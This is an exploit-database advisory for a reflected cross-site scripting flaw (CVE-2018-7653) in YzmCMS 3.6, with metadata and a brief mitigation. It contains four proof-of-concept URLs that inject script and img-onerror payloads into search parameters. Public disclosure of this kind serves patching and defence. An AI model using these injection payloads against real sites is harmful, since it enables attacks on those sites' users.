YzmCMS 3.6 XSS Vulnerability

vendor:

YzmCMS

by:

zzw

6.1

CVSS

MEDIUM

XSS

CWE

Product Name: YzmCMS

Affected Version From: 3.6

Affected Version To: 3.6

Patch Exists: YES

Related CWE: CVE-2018-7653

CPE: a:yzmcms:yzmcms:3.6

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2018

YzmCMS 3.6 XSS Vulnerability

This is a XSS vulnerability than can attack the users. The PoC includes four URLs that contain malicious code that can be used to execute a XSS attack.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.

Source

Exploit-DB raw data:

# Exploit Title: YzmCMS 3.6 XSS Vulnerability
# Date: 2018-04-03
# Exploit Author: zzw (zzw@5ecurity.cn)
# Vendor Homepage: http://www.yzmcms.com/
# Software Link: http://www.yzmcms.com/
# Version: 3.6
# CVE : CVE-2018-7653

This is a XSS vulnerability than can attack the users.

poc:

http://localhost/YzmCMS/index.php?m=search&c=index&a=initxqb4n%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecu9rs&modelid=1&q=tes 

http://localhost/YzmCMS/index.php?m=search&c=indexf9q6s%3cimg%20src%3da%20onerror%3dalert(1)%3ej4yck&a=init&modelid=1&q=tes 

http://localhost/YzmCMS/index.php?m=searchr81z4%3cimg%20src%3da%20onerror%3dalert(1)%3eo92wf&c=index&a=init&modelid=1&q=tes 

http://localhost/YzmCMS/index.php?m=search&c=index&a=init&modelid=1b2sgd%22%3e%3cscript%3ealert(1)%3c%2fscript%3eopzx0&q=tes